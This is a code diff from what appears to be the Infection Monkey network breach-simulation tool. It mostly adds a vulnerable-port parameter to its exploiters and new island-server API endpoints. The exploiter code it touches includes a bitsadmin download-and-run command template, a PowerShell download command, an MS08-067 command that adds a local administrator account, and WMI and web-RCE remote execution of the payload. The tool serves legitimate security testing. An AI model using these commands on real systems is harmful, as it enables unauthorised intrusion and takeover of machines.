@ -0,0 +1,28 @@
import unittest
from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
class TestHelpers(unittest.TestCase):
def test_build_monkey_commandline_explicitly(self):
test1 = " -p 101010 -t 10.10.101.10 -s 127.127.127.127:5000 -d 0 -l C:\\windows\\abc -vp 80"
result1 = build_monkey_commandline_explicitly(101010,
"10.10.101.10",
"127.127.127.127:5000",
0,
"C:\\windows\\abc",
80)
test2 = " -p parent -s 127.127.127.127:5000 -d 0 -vp 80"
result2 = build_monkey_commandline_explicitly(parent="parent",
server="127.127.127.127:5000",
depth="0",
vulnerable_port="80")
self.assertEqual(test1, result1)
self.assertEqual(test2, result2)
if __name__ == '__main__':
unittest.main()

View File

@ -132,7 +132,9 @@ class VSFTPDExploiter(HostExploiter):
T1222Telem(ScanStatus.USED, change_permission.decode(), self.host).send()
# Run monkey on the machine
parameters = build_monkey_commandline(self.host, get_monkey_depth() - 1)
parameters = build_monkey_commandline(self.host,
get_monkey_depth() - 1,
vulnerable_port=FTP_PORT)
run_monkey = RUN_MONKEY % {'monkey_path': monkey_path, 'monkey_type': MONKEY_ARG, 'parameters': parameters}
# Set unlimited to memory

View File

@ -42,6 +42,8 @@ class WebRCE(HostExploiter):
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.skip_exist = self._config.skip_exploit_if_file_exist
self.vulnerable_urls = []
self.target_url = None
self.vulnerable_port = None
def get_exploit_config(self):
"""
@ -87,27 +89,30 @@ class WebRCE(HostExploiter):
if not self.vulnerable_urls:
return False
self.target_url = self.vulnerable_urls[0]
self.vulnerable_port = HTTPTools.get_port_from_url(self.target_url)
# Skip if monkey already exists and this option is given
if not exploit_config['blind_exploit'] and self.skip_exist and self.check_remote_files(self.vulnerable_urls[0]):
if not exploit_config['blind_exploit'] and self.skip_exist and self.check_remote_files(self.target_url):
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True
# Check for targets architecture (if it's 32 or 64 bit)
if not exploit_config['blind_exploit'] and not self.set_host_arch(self.vulnerable_urls[0]):
if not exploit_config['blind_exploit'] and not self.set_host_arch(self.target_url):
return False
# Upload the right monkey to target
data = self.upload_monkey(self.vulnerable_urls[0], exploit_config['upload_commands'])
data = self.upload_monkey(self.target_url, exploit_config['upload_commands'])
if data is False:
return False
# Change permissions to transform monkey into executable file
if self.change_permissions(self.vulnerable_urls[0], data['path']) is False:
if self.change_permissions(self.target_url, data['path']) is False:
return False
# Execute remote monkey
if self.execute_remote_monkey(self.vulnerable_urls[0], data['path'], exploit_config['dropper']) is False:
if self.execute_remote_monkey(self.target_url, data['path'], exploit_config['dropper']) is False:
return False
return True
@ -403,10 +408,15 @@ class WebRCE(HostExploiter):
default_path = self.get_default_dropper_path()
if default_path is False:
return False
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, default_path)
monkey_cmd = build_monkey_commandline(self.host,
get_monkey_depth() - 1,
self.vulnerable_port,
default_path)
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd}
else:
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
monkey_cmd = build_monkey_commandline(self.host,
get_monkey_depth() - 1,
self.vulnerable_port)
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd}
try:
LOG.info("Trying to execute monkey using command: {}".format(command))
@ -489,3 +499,6 @@ class WebRCE(HostExploiter):
except KeyError:
LOG.debug("Target's machine type was not set. Using win-32 dropper path.")
return self._config.dropper_target_path_win_32
def set_vulnerable_port_from_url(self, url):
self.vulnerable_port = HTTPTools.get_port_from_url(url)

View File

@ -4,7 +4,6 @@ import time
import copy
from requests import post, exceptions
from http.server import BaseHTTPRequestHandler, HTTPServer
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.exploit.HostExploiter import HostExploiter

View File

@ -193,9 +193,9 @@ class Ms08_067_Exploiter(HostExploiter):
sock.send("cmd /c (net user {} {} /add) &&"
" (net localgroup administrators {} /add)\r\n".format(
self._config.user_to_add,
self._config.remote_user_pass,
self._config.user_to_add).encode())
self._config.user_to_add,
self._config.remote_user_pass,
self._config.user_to_add).encode())
time.sleep(2)
reply = sock.recv(1000)
@ -234,11 +234,15 @@ class Ms08_067_Exploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1,
build_monkey_commandline(self.host,
get_monkey_depth() - 1,
SRVSVC_Exploit.TELNET_PORT,
self._config.dropper_target_path_win_32)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1)
build_monkey_commandline(self.host,
get_monkey_depth() - 1,
vulnerable_port=SRVSVC_Exploit.TELNET_PORT)
try:
sock.send("start %s\r\n" % (cmdline,))

View File

@ -21,6 +21,7 @@ class WmiExploiter(HostExploiter):
_TARGET_OS_TYPE = ['windows']
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
_EXPLOITED_SERVICE = 'WMI (Windows Management Instrumentation)'
VULNERABLE_PORT = 135
def __init__(self, host):
super(WmiExploiter, self).__init__(host)
@ -94,11 +95,15 @@ class WmiExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
build_monkey_commandline(
self.host, get_monkey_depth() - 1, self._config.dropper_target_path_win_32)
build_monkey_commandline(self.host,
get_monkey_depth() - 1,
WmiExploiter.VULNERABLE_PORT,
self._config.dropper_target_path_win_32)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
build_monkey_commandline(self.host, get_monkey_depth() - 1)
build_monkey_commandline(self.host,
get_monkey_depth() - 1,
WmiExploiter.VULNERABLE_PORT)
# execute the remote monkey
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,

View File

@ -14,10 +14,10 @@ MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG,)
GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)'
DROPPER_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(dropper_path)s %s' % (CMD_PREFIX, DROPPER_ARG,)
MONKEY_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(monkey_path)s %s' % (CMD_PREFIX, MONKEY_ARG,)
MONKEY_CMDLINE_HTTP = '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \
'/c %%(monkey_path)s %s"' % (CMD_PREFIX, MONKEY_ARG,)
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \
'file_path)s exit)) > NUL 2>&1 '
MONKEY_CMDLINE_HTTP = '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s' \
'&cmd /c %%(monkey_path)s %s"' % (CMD_PREFIX, MONKEY_ARG,)
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & ' \
'if not exist %(file_path)s exit)) > NUL 2>&1 '
# Commands used for downloading monkeys
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \

View File

@ -10,6 +10,7 @@ from infection_monkey.network.HostFinger import HostFinger
from infection_monkey.utils.monkey_dir import create_monkey_dir, get_monkey_dir_path, remove_monkey_dir
from infection_monkey.utils.monkey_log_path import get_monkey_log_path
from infection_monkey.utils.environment import is_windows_os
from infection_monkey.utils.exceptions.planned_shutdown_exception import PlannedShutdownException
from infection_monkey.config import WormConfiguration
from infection_monkey.control import ControlClient
from infection_monkey.model import DELAY_DELETE_CMD
@ -26,12 +27,13 @@ from infection_monkey.telemetry.trace_telem import TraceTelem
from infection_monkey.telemetry.tunnel_telem import TunnelTelem
from infection_monkey.windows_upgrader import WindowsUpgrader
from infection_monkey.post_breach.post_breach_handler import PostBreach
from infection_monkey.network.tools import get_interface_to_target
from infection_monkey.network.tools import get_interface_to_target, is_running_on_server
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
from common.utils.attack_utils import ScanStatus, UsageEnum
from common.version import get_version
from infection_monkey.exploit.HostExploiter import HostExploiter
from common.network.network_utils import get_host_from_network_location
MAX_DEPTH_REACHED_MESSAGE = "Reached max depth, shutting down"
@ -40,10 +42,6 @@ __author__ = 'itamar'
LOG = logging.getLogger(__name__)
class PlannedShutdownException(Exception):
pass
class InfectionMonkey(object):
def __init__(self, args):
self._keep_running = False
@ -74,14 +72,20 @@ class InfectionMonkey(object):
arg_parser.add_argument('-t', '--tunnel')
arg_parser.add_argument('-s', '--server')
arg_parser.add_argument('-d', '--depth', type=int)
arg_parser.add_argument('-vp', '--vulnerable-port')
self._opts, self._args = arg_parser.parse_known_args(self._args)
self.log_arguments()
self._parent = self._opts.parent
self._default_tunnel = self._opts.tunnel
self._default_server = self._opts.server
if self._opts.depth:
if self._opts.depth is not None:
WormConfiguration._depth_from_commandline = True
WormConfiguration.depth = self._opts.depth
LOG.debug(f"Setting propagation depth from command line")
LOG.debug(f"Set propagation depth to {WormConfiguration.depth}")
self._keep_running = True
self._network = NetworkScanner()
self._dropper_path = sys.argv[0]
@ -115,6 +119,10 @@ class InfectionMonkey(object):
self.shutdown_by_not_alive_config()
if self.is_started_on_island():
ControlClient.report_start_on_island()
ControlClient.should_monkey_run(self._opts.vulnerable_port)
if firewall.is_enabled():
firewall.add_firewall_rule()
@ -376,3 +384,11 @@ class InfectionMonkey(object):
raise PlannedShutdownException("Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel))
self._default_server = WormConfiguration.current_server
LOG.debug("default server set to: %s" % self._default_server)
def is_started_on_island(self):
island_ip = get_host_from_network_location(self._default_server)
return is_running_on_server(island_ip) and WormConfiguration.depth == WormConfiguration.max_depth
def log_arguments(self):
arg_string = " ".join([f"{key}: {value}" for key, value in vars(self._opts).items()])
LOG.info(f"Monkey started with arguments: {arg_string}")

View File

@ -51,18 +51,15 @@ if is_windows_os():
local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2]
def get_routes():
raise NotImplementedError()
else:
from fcntl import ioctl
def local_ips():
valid_ips = [network['addr'] for network in get_host_subnets()]
return valid_ips
def get_routes(): # based on scapy implementation for route parsing
try:
f = open("/proc/net/route", "r")

View File

@ -7,7 +7,6 @@ import sys
import infection_monkey.config
from infection_monkey.network.HostFinger import HostFinger
from infection_monkey.network.HostScanner import HostScanner
from infection_monkey.model.host import VictimHost
__author__ = 'itamar'

View File

@ -7,7 +7,7 @@ import struct
import time
import re
from infection_monkey.network.info import get_routes
from infection_monkey.network.info import get_routes, local_ips
from infection_monkey.pyinstaller_utils import get_binary_file_path
from infection_monkey.utils.environment import is_64bit_python
@ -309,3 +309,7 @@ def get_interface_to_target(dst):
paths.sort()
ret = paths[-1][1]
return ret[1]
def is_running_on_server(ip: str) -> bool:
return ip in local_ips()

View File

@ -13,8 +13,7 @@ ipaddress
# See breaking change here: https://github.com/tjguk/wmi/commit/dcf8e3eca79bb8c0101ffb83e25c066b0ba9e16d
# Causes pip to error with:
# Could not find a version that satisfies the requirement pywin32 (from wmi->-r /src/infection_monkey/requirements.txt (line 12)) (from versions: none)
wmi==1.4.9
pywin32 ; sys_platform == 'win32'
wmi==1.4.9 ; sys_platform == 'win32'
pymssql<3.0
pyftpdlib
WinSys-3.x

View File

@ -1,5 +1,4 @@
import logging
import socket
import sys
import psutil

View File

@ -1,3 +1 @@
from infection_monkey.transport.http import HTTPServer, LockedHTTPServer
__author__ = 'hoffer'

View File

@ -0,0 +1,2 @@
class PlannedShutdownException(Exception):
pass

View File

@ -73,7 +73,6 @@ class AutoNewWindowsUser(AutoNewUser):
def run_as(self, command):
# Importing these only on windows, as they won't exist on linux.
import win32con
import win32process
import win32api
import win32event

View File

@ -16,10 +16,12 @@ from monkey_island.cc.resources.island_logs import IslandLog
from monkey_island.cc.resources.monkey import Monkey
from monkey_island.cc.resources.monkey_configuration import MonkeyConfiguration
from monkey_island.cc.resources.island_configuration import IslandConfiguration
from monkey_island.cc.resources.monkey_control.started_on_island import StartedOnIsland
from monkey_island.cc.resources.monkey_download import MonkeyDownload
from monkey_island.cc.resources.netmap import NetMap
from monkey_island.cc.resources.node import Node
from monkey_island.cc.resources.node_states import NodeStates
from monkey_island.cc.resources.monkey_control.remote_port_check import RemotePortCheck
from monkey_island.cc.resources.remote_run import RemoteRun
from monkey_island.cc.resources.reporting.report import Report
from monkey_island.cc.resources.root import Root
@ -32,6 +34,7 @@ from monkey_island.cc.resources.pba_file_upload import FileUpload
from monkey_island.cc.resources.attack.attack_config import AttackConfiguration
from monkey_island.cc.resources.attack.attack_report import AttackReport
from monkey_island.cc.resources.bootloader import Bootloader
from monkey_island.cc.resources.zero_trust.finding_event import ZeroTrustFindingEvent
from monkey_island.cc.services.database import Database
from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService
from monkey_island.cc.services.representations import output_json
@ -107,6 +110,7 @@ def init_api_resources(api):
Report,
'/api/report/<string:report_type>',
'/api/report/<string:report_type>/<string:report_data>')
api.add_resource(ZeroTrustFindingEvent, '/api/zero-trust/finding-event/<string:finding_id>')
api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/')
api.add_resource(Log, '/api/log', '/api/log/')
@ -119,6 +123,8 @@ def init_api_resources(api):
api.add_resource(AttackConfiguration, '/api/attack')
api.add_resource(AttackReport, '/api/attack/report')
api.add_resource(VersionUpdate, '/api/version-update', '/api/version-update/')
api.add_resource(RemotePortCheck, '/api/monkey_control/check_remote_port/<string:port>')
api.add_resource(StartedOnIsland, '/api/monkey_control/started_on_island')
api.add_resource(MonkeyTest, '/api/test/monkey')
api.add_resource(ClearCaches, '/api/test/clear_caches')

View File

@ -10,7 +10,7 @@ import pymongo
from monkey_island.cc.environment import Environment
# Disable "unverified certificate" warnings when sending requests to island
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # noqa: DUO131
logger = logging.getLogger(__name__)
@ -29,7 +29,9 @@ class BootloaderHTTPRequestHandler(BaseHTTPRequestHandler):
post_data = self.rfile.read(content_length).decode()
island_server_path = BootloaderHTTPRequestHandler.get_bootloader_resource_url(self.request.getsockname()[0])
island_server_path = parse.urljoin(island_server_path, self.path[1:])
r = requests.post(url=island_server_path, data=post_data, verify=False)
# The island server doesn't always have a correct SSL cert installed (By default it comes with a self signed one),
# that's why we're not verifying the cert in this request.
r = requests.post(url=island_server_path, data=post_data, verify=False) # noqa: DUO123
try:
if r.status_code != 200:
@ -46,4 +48,3 @@ class BootloaderHTTPRequestHandler(BaseHTTPRequestHandler):
@staticmethod
def get_bootloader_resource_url(server_ip):
return "https://" + server_ip + ":" + str(Environment._ISLAND_PORT) + "/api/bootloader/"

View File

@ -9,7 +9,8 @@ class TestAwsEnvironment(IslandTestCase):
def test_get_auth_users(self):
env = AwsEnvironment()
# This is "injecting" the instance id to the env. This is the UTs aren't always executed on the same AWS machine
# (might not be an AWS machine at all). Perhaps it would have been more elegant to create a Mock, but not worth it for
# (might not be an AWS machine at all).
# Perhaps it would have been more elegant to create a Mock, but not worth it for
# this small test.
env._instance_id = "i-666"
hash_obj = hashlib.sha3_512()
@ -22,5 +23,3 @@ class TestAwsEnvironment(IslandTestCase):
assert auth_user.id == 1
assert auth_user.username == "monkey"
assert auth_user.secret == hash_obj.hexdigest()

View File

@ -22,7 +22,7 @@ logger = logging.getLogger(__name__)
from monkey_island.cc.app import init_app
from monkey_island.cc.services.reporting.exporter_init import populate_exporter_list
from monkey_island.cc.utils import local_ip_addresses
from monkey_island.cc.network_utils import local_ip_addresses
from monkey_island.cc.environment.environment import env
from monkey_island.cc.database import is_db_server_up, get_db_version
from monkey_island.cc.resources.monkey_download import MonkeyDownload

View File

@ -12,9 +12,9 @@ else:
connect(db=env.mongo_db_name, host=env.mongo_db_host, port=env.mongo_db_port)
# Order of importing matters here, for registering the embedded and referenced documents before using them.
from .config import Config
from .creds import Creds
from .monkey_ttl import MonkeyTtl
from .pba_results import PbaResults
from .command_control_channel import CommandControlChannel
from .monkey import Monkey
from .config import Config # noqa: F401
from .creds import Creds # noqa: F401
from .monkey_ttl import MonkeyTtl # noqa: F401
from .pba_results import PbaResults # noqa: F401
from .command_control_channel import CommandControlChannel # noqa: F401
from .monkey import Monkey # noqa: F401

View File

@ -16,4 +16,3 @@ class Mitigation(EmbeddedDocument):
description = mitigation['description']
url = MitreApiInterface.get_stix2_external_reference_url(mitigation)
return Mitigation(name=name, description=description, url=url)

View File

@ -8,7 +8,7 @@ import ring
from monkey_island.cc.models.monkey_ttl import MonkeyTtl, create_monkey_ttl_document
from monkey_island.cc.consts import DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS
from monkey_island.cc.models.command_control_channel import CommandControlChannel
from monkey_island.cc.utils import local_ip_addresses
from monkey_island.cc.network_utils import local_ip_addresses
from common.cloud import environment_names
MAX_MONKEYS_AMOUNT_TO_CACHE = 100

View File

@ -13,8 +13,8 @@ logger = logging.getLogger(__name__)
class TestMonkey(IslandTestCase):
"""
Make sure to set server environment to `testing` in server_config.json! Otherwise this will mess up your mongo instance and
won't work.
Make sure to set server environment to `testing` in server_config.json!
Otherwise this will mess up your mongo instance and won't work.
Also, the working directory needs to be the working directory from which you usually run the island so the
server_config.json file is found and loaded.

View File

@ -0,0 +1,13 @@
"""
Define a Document Schema for the TestTelem document.
"""
from mongoengine import Document, StringField, DateTimeField
class TestTelem(Document):
# SCHEMA
name = StringField(required=True)
time = DateTimeField(required=True)
method = StringField(required=True)
endpoint = StringField(required=True)
content = StringField(required=True)

View File

@ -12,7 +12,7 @@ class AggregateFinding(Finding):
:raises: Assertion error if this is used when there's more then one finding which fits the query - this is not
when this function should be used.
"""
existing_findings = Finding.objects(test=test, status=status)
existing_findings = Finding.objects(test=test, status=status).exclude('events')
assert (len(existing_findings) < 2), "More than one finding exists for {}:{}".format(test, status)
if len(existing_findings) == 0:
@ -21,7 +21,6 @@ class AggregateFinding(Finding):
# Now we know for sure this is the only one
orig_finding = existing_findings[0]
orig_finding.add_events(events)
orig_finding.save()
def add_malicious_activity_to_timeline(events):

View File

@ -23,7 +23,9 @@ class Event(EmbeddedDocument):
# LOGIC
@staticmethod
def create_event(title, message, event_type, timestamp=datetime.now()):
def create_event(title, message, event_type, timestamp=None):
if not timestamp:
timestamp = datetime.now()
event = Event(
timestamp=timestamp,
title=title,

View File

@ -2,6 +2,7 @@
"""
Define a Document Schema for Zero Trust findings.
"""
from typing import List
from mongoengine import Document, StringField, EmbeddedDocumentListField
@ -55,6 +56,5 @@ class Finding(Document):
return finding
def add_events(self, events):
# type: (list) -> None
self.events.extend(events)
def add_events(self, events: List) -> None:
self.update(push_all__events=events)

View File

@ -1,3 +1,8 @@
import unittest
from packaging import version
import mongomock
import common.data.zero_trust_consts as zero_trust_consts
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
from monkey_island.cc.models.zero_trust.event import Event
@ -6,6 +11,9 @@ from monkey_island.cc.testing.IslandTestCase import IslandTestCase
class TestAggregateFinding(IslandTestCase):
@unittest.skipIf(version.parse(mongomock.__version__) <= version.parse("3.19.0"),
"mongomock version doesn't support this test")
def test_create_or_add_to_existing(self):
self.fail_if_not_testing_env()
self.clean_finding_db()
@ -25,6 +33,8 @@ class TestAggregateFinding(IslandTestCase):
self.assertEqual(len(Finding.objects(test=test, status=status)), 1)
self.assertEqual(len(Finding.objects(test=test, status=status)[0].events), 2)
@unittest.skipIf(version.parse(mongomock.__version__) <= version.parse("3.19.0"),
"mongomock version doesn't support this test")
def test_create_or_add_to_existing_2_tests_already_exist(self):
self.fail_if_not_testing_env()
self.clean_finding_db()

View File

@ -33,7 +33,8 @@ class TestFinding(IslandTestCase):
event_example = Event.create_event(
title="Event Title", message="event message", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK)
Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED, events=[event_example])
Finding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION,
status=zero_trust_consts.STATUS_FAILED, events=[event_example])
self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 1)
self.assertEqual(len(Finding.objects(status=zero_trust_consts.STATUS_FAILED)), 1)

View File

@ -1,12 +1,11 @@
import array
import collections
import ipaddress
import socket
import struct
import sys
from typing import List
import collections
import array
import struct
import ipaddress
from netifaces import interfaces, ifaddresses, AF_INET
from ring import lru
@ -20,7 +19,6 @@ if sys.platform == "win32":
else:
import fcntl
def local_ips():
result = []
try:

View File

@ -1,7 +1,6 @@
from unittest import TestCase
from monkey_island.cc.resources.bootloader import Bootloader
from monkey_island.cc.services.utils.bootloader_config import SUPPORTED_WINDOWS_VERSIONS
class TestBootloader(TestCase):

View File

@ -10,7 +10,7 @@ from monkey_island.cc.environment.environment import env
from monkey_island.cc.models import Monkey
from monkey_island.cc.resources.monkey_download import get_monkey_executable
from monkey_island.cc.services.node import NodeService
from monkey_island.cc.utils import local_ip_addresses
from monkey_island.cc.network_utils import local_ip_addresses
from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH
__author__ = 'Barak'

View File

@ -6,6 +6,7 @@ from flask import request
from monkey_island.cc.auth import jwt_required
from monkey_island.cc.database import mongo
from monkey_island.cc.resources.test.utils.telem_store import TestTelemStore
from monkey_island.cc.services.log import LogService
from monkey_island.cc.services.node import NodeService
@ -23,6 +24,7 @@ class Log(flask_restful.Resource):
return LogService.log_exists(ObjectId(exists_monkey_id))
# Used by monkey. can't secure.
@TestTelemStore.store_test_telem
def post(self):
telemetry_json = json.loads(request.data)

View File

@ -3,6 +3,7 @@ from datetime import datetime
import dateutil.parser
import flask_restful
from monkey_island.cc.resources.test.utils.telem_store import TestTelemStore
from flask import request
from monkey_island.cc.consts import DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS
@ -33,6 +34,7 @@ class Monkey(flask_restful.Resource):
return {}
# Used by monkey. can't secure.
@TestTelemStore.store_test_telem
def patch(self, guid):
monkey_json = json.loads(request.data)
update = {"$set": {'modifytime': datetime.now()}}
@ -56,6 +58,8 @@ class Monkey(flask_restful.Resource):
return mongo.db.monkey.update({"_id": monkey["_id"]}, update, upsert=False)
# Used by monkey. can't secure.
# Called on monkey wakeup to initialize local configuration
@TestTelemStore.store_test_telem
def post(self, **kw):
monkey_json = json.loads(request.data)
monkey_json['creds'] = []
@ -71,16 +75,11 @@ class Monkey(flask_restful.Resource):
# if new monkey telem, change config according to "new monkeys" config.
db_monkey = mongo.db.monkey.find_one({"guid": monkey_json["guid"]})
if not db_monkey:
# we pull it encrypted because we then decrypt it for the monkey in get
new_config = ConfigService.get_flat_config(False, False)
monkey_json['config'] = monkey_json.get('config', {})
monkey_json['config'].update(new_config)
else:
db_config = db_monkey.get('config', {})
if 'current_server' in db_config:
del db_config['current_server']
monkey_json.get('config', {}).update(db_config)
# Update monkey configuration
new_config = ConfigService.get_flat_config(False, False)
monkey_json['config'] = monkey_json.get('config', {})
monkey_json['config'].update(new_config)
# try to find new monkey parent
parent = monkey_json.get('parent')

View File

@ -0,0 +1,14 @@
import flask_restful
from flask import request
from monkey_island.cc.services.remote_port_check import check_tcp_port
class RemotePortCheck(flask_restful.Resource):
# Used by monkey. can't secure.
def get(self, port):
if port and check_tcp_port(request.remote_addr, port):
return {"status": "port_visible"}
else:
return {"status": "port_invisible"}

View File

@ -0,0 +1,16 @@
import json
import flask_restful
from flask import request, make_response
from monkey_island.cc.services.config import ConfigService
class StartedOnIsland(flask_restful.Resource):
# Used by monkey. can't secure.
def post(self):
data = json.loads(request.data)
if data['started_on_island']:
ConfigService.set_started_on_island(True)
return make_response({}, 200)

View File

@ -1,4 +1,3 @@
from flask import request
import flask_restful
from monkey_island.cc.auth import jwt_required

View File

@ -1,6 +1,5 @@
import logging
import threading
from datetime import datetime
import flask_restful
from flask import request, make_response, jsonify
@ -8,11 +7,8 @@ from flask import request, make_response, jsonify
from monkey_island.cc.auth import jwt_required
from monkey_island.cc.database import mongo
from monkey_island.cc.services.database import Database
from monkey_island.cc.services.node import NodeService
from monkey_island.cc.services.reporting.report import ReportService
from monkey_island.cc.services.reporting.report_generation_synchronisation import is_report_being_generated, \
safe_generate_reports
from monkey_island.cc.utils import local_ip_addresses
from monkey_island.cc.services.infection_lifecycle import InfectionLifecycle
from monkey_island.cc.network_utils import local_ip_addresses
__author__ = 'Barak'
@ -32,7 +28,7 @@ class Root(flask_restful.Resource):
elif action == "reset":
return jwt_required()(Database.reset_db)()
elif action == "killall":
return Root.kill_all()
return jwt_required()(InfectionLifecycle.kill_all)()
elif action == "is-up":
return {'is-up': True}
else:
@ -43,33 +39,6 @@ class Root(flask_restful.Resource):
return jsonify(
ip_addresses=local_ip_addresses(),
mongo=str(mongo.db),
completed_steps=self.get_completed_steps())
completed_steps=InfectionLifecycle.get_completed_steps())
@staticmethod
@jwt_required()
def kill_all():
mongo.db.monkey.update({'dead': False}, {'$set': {'config.alive': False, 'modifytime': datetime.now()}},
upsert=False,
multi=True)
logger.info('Kill all monkeys was called')
return jsonify(status='OK')
@jwt_required()
def get_completed_steps(self):
is_any_exists = NodeService.is_any_monkey_exists()
infection_done = NodeService.is_monkey_finished_running()
if infection_done:
# Checking is_report_being_generated here, because we don't want to wait to generate a report; rather,
# we want to skip and reply.
if not is_report_being_generated() and not ReportService.is_latest_report_exists():
safe_generate_reports()
report_done = ReportService.is_report_generated()
else: # Infection is not done
report_done = False
return dict(
run_server=True,
run_monkey=is_any_exists,
infection_done=infection_done,
report_done=report_done)

View File

@ -8,6 +8,7 @@ from flask import request
from monkey_island.cc.auth import jwt_required
from monkey_island.cc.database import mongo
from monkey_island.cc.resources.test.utils.telem_store import TestTelemStore
from monkey_island.cc.services.node import NodeService
from monkey_island.cc.services.telemetry.processing.processing import process_telemetry
from monkey_island.cc.models.monkey import Monkey
@ -40,6 +41,7 @@ class Telemetry(flask_restful.Resource):
return result
# Used by monkey. can't secure.
@TestTelemStore.store_test_telem
def post(self):
telemetry_json = json.loads(request.data)
telemetry_json['timestamp'] = datetime.now()

View File

@ -0,0 +1,71 @@
import logging
from functools import wraps
from os import mkdir, path
import shutil
from datetime import datetime
from flask import request
from monkey_island.cc.models.test_telem import TestTelem
from monkey_island.cc.services.config import ConfigService
TELEM_SAMPLE_DIR = "./telem_sample"
MAX_SAME_CATEGORY_TELEMS = 10000
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class TestTelemStore:
TELEMS_EXPORTED = False
@staticmethod
def store_test_telem(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if ConfigService.is_test_telem_export_enabled():
time = datetime.now()
method = request.method
content = request.data.decode()
endpoint = request.path
name = str(request.url_rule).replace('/', '_').replace('<', '_').replace('>', '_').replace(':', '_')
TestTelem(name=name, method=method, endpoint=endpoint, content=content, time=time).save()
return f(*args, **kwargs)
return decorated_function
@staticmethod
def export_test_telems():
logger.info(f"Exporting all telemetries to {TELEM_SAMPLE_DIR}")
try:
mkdir(TELEM_SAMPLE_DIR)
except FileExistsError:
logger.info("Deleting all previous telemetries.")
shutil.rmtree(TELEM_SAMPLE_DIR)
mkdir(TELEM_SAMPLE_DIR)
for test_telem in TestTelem.objects():
with open(TestTelemStore.get_unique_file_path_for_test_telem(TELEM_SAMPLE_DIR, test_telem), 'w') as file:
file.write(test_telem.to_json(indent=2))
TestTelemStore.TELEMS_EXPORTED = True
logger.info("Telemetries exported!")
@staticmethod
def get_unique_file_path_for_test_telem(target_dir: str, test_telem: TestTelem):
telem_filename = TestTelemStore._get_filename_by_test_telem(test_telem)
for i in range(MAX_SAME_CATEGORY_TELEMS):
potential_filepath = path.join(target_dir, (telem_filename + str(i)))
if path.exists(potential_filepath):
continue
return potential_filepath
raise Exception(f"Too many telemetries of the same category. Max amount {MAX_SAME_CATEGORY_TELEMS}")
@staticmethod
def _get_filename_by_test_telem(test_telem: TestTelem):
endpoint_part = test_telem.name
return endpoint_part + '_' + test_telem.method
if __name__ == '__main__':
TestTelemStore.export_test_telems()

View File

@ -0,0 +1,12 @@
import flask_restful
import json
from monkey_island.cc.auth import jwt_required
from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService
class ZeroTrustFindingEvent(flask_restful.Resource):
@jwt_required()
def get(self, finding_id: str):
return {'events_json': json.dumps(ZeroTrustService.get_events_by_finding(finding_id), default=str)}

View File

@ -120,7 +120,7 @@ class AttackConfig(object):
def set_bool_conf_val(path, val, monkey_config):
"""
Changes monkey's configuration by setting one of its boolean fields value
:param path: Path to boolean value in monkey's configuration. E.g. ['monkey', 'system_info', 'should_use_mimikatz']
:param path: Path to boolean value in monkey's configuration. ['monkey', 'system_info', 'should_use_mimikatz']
:param val: Boolean
:param monkey_config: Monkey's configuration
"""
@ -183,5 +183,5 @@ class AttackConfig(object):
techniques = {}
for type_name, attack_type in list(attack_config.items()):
for key, technique in list(attack_type['properties'].items()):
techniques[key] = {'selected': technique['value'], 'type': SCHEMA['properties'][type_name]['title']}
